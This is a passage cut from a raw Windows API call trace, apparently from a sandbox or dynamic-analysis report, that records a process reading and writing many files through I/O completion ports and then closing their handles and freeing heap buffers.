dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x51b0020) returned 1 [0149.893] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.893] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x52d0020) returned 1 [0149.893] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.893] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x53f0020) returned 1 [0149.893] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.893] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5510020) returned 1 [0149.894] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.894] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5630020) returned 1 [0149.894] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.894] WriteFile (in: hFile=0x634, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020) returned 1 [0149.894] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.894] WriteFile (in: hFile=0x13c, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020) returned 1 [0149.894] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.894] WriteFile (in: hFile=0x650, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4790020) returned 1 [0149.894] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.894] WriteFile (in: hFile=0x64c, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020) returned 1 [0149.894] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.895] WriteFile (in: hFile=0x624, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x49d0020) returned 1 [0149.895] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.895] WriteFile (in: hFile=0x654, lpBuffer=0x4af0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4af0020) returned 1 [0149.895] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.895] WriteFile (in: hFile=0x660, lpBuffer=0x4c10094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4c10020) returned 1 [0149.895] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.895] WriteFile (in: hFile=0x138, lpBuffer=0x4d30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4d30020) returned 1 [0149.895] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.895] WriteFile (in: hFile=0x63c, lpBuffer=0x4e50094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4e50020) returned 1 [0149.896] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.896] WriteFile (in: hFile=0xd8, lpBuffer=0x4f70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4f70020) returned 1 [0149.896] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.896] WriteFile (in: hFile=0x628, lpBuffer=0x5090094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5090020 | out: lpBuffer=0x5090094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5090020) returned 1 [0149.896] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.896] WriteFile (in: hFile=0x618, lpBuffer=0x51b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x51b0020 | out: lpBuffer=0x51b0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x51b0020) returned 1 [0149.896] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.897] WriteFile (in: hFile=0x66c, lpBuffer=0x52d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x52d0020 | out: lpBuffer=0x52d0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x52d0020) returned 1 [0149.897] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.897] WriteFile (in: hFile=0x61c, lpBuffer=0x53f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x53f0020 | out: lpBuffer=0x53f0094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x53f0020) returned 1 [0149.897] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.897] WriteFile (in: hFile=0x610, lpBuffer=0x5510094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5510020 | out: lpBuffer=0x5510094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5510020) returned 1 [0149.897] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.897] WriteFile (in: hFile=0x678, lpBuffer=0x5630094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5630020 | out: lpBuffer=0x5630094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5630020) returned 1 [0149.898] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.898] CloseHandle (hObject=0x634) returned 1 [0149.899] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0149.900] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.900] CloseHandle (hObject=0x13c) returned 1 [0149.901] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0149.902] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.902] CloseHandle (hObject=0x650) returned 1 [0149.903] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0149.903] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.903] CloseHandle (hObject=0x64c) returned 1 [0149.904] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0149.904] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.905] CloseHandle (hObject=0x624) returned 1 [0149.906] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0149.906] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.906] CloseHandle (hObject=0x654) returned 1 [0149.907] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4af0020) returned 1 [0149.907] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.908] CloseHandle (hObject=0x660) returned 1 [0149.909] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4c10020) returned 1 [0149.909] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.909] CloseHandle (hObject=0x138) returned 1 [0149.910] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4d30020) returned 1 [0149.910] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.910] CloseHandle (hObject=0x63c) returned 1 [0149.911] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4e50020) returned 1 [0149.912] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.912] CloseHandle (hObject=0xd8) returned 1 [0149.913] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4f70020) returned 1 [0149.913] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.913] CloseHandle (hObject=0x628) returned 1 [0149.914] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5090020) returned 1 [0149.963] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.963] CloseHandle (hObject=0x618) returned 1 [0149.964] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x51b0020) returned 1 [0149.964] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.965] CloseHandle (hObject=0x66c) returned 1 [0149.965] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x52d0020) returned 1 [0149.966] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.966] CloseHandle (hObject=0x61c) returned 1 [0149.967] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x53f0020) returned 1 [0149.967] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.967] CloseHandle (hObject=0x610) returned 1 [0149.968] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5510020) returned 1 [0149.968] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.968] CloseHandle (hObject=0x678) returned 1 [0149.969] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5630020) returned 1 [0149.970] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.015] ReadFile (in: hFile=0x610, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0150.015] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.015] WriteFile (in: hFile=0x610, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0150.021] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.021] ReadFile (in: hFile=0x610, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0150.021] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0150.021] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.021] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.021] WriteFile (in: hFile=0x610, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0150.029] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.029] CloseHandle (hObject=0x610) returned 1 [0150.043] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0150.043] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.199] ReadFile (in: hFile=0x620, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x2f30020) returned 1 [0150.352] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.352] ReadFile (in: hFile=0x664, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4280020) returned 1 [0150.352] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.353] ReadFile (in: hFile=0x668, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4700020) returned 1 [0150.353] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.353] ReadFile (in: hFile=0x2e0, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4820020) returned 1 [0150.354] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.354] ReadFile (in: hFile=0x610, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4940020) returned 1 [0150.355] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.355] ReadFile (in: hFile=0x134, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4a60020) returned 1 [0150.356] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.356] ReadFile (in: hFile=0x618, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4b80020) returned 1 [0150.357] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.357] ReadFile (in: hFile=0x66c, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4ca0020) returned 1 [0150.358] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.358] WriteFile (in: hFile=0x620, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x2f30020) returned 1 [0150.358] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.358] WriteFile (in: hFile=0x664, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4280020) returned 1 [0150.358] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0150.358] WriteFile (in: hFile=0x668, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4700020) returned 1 [0150.358] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, 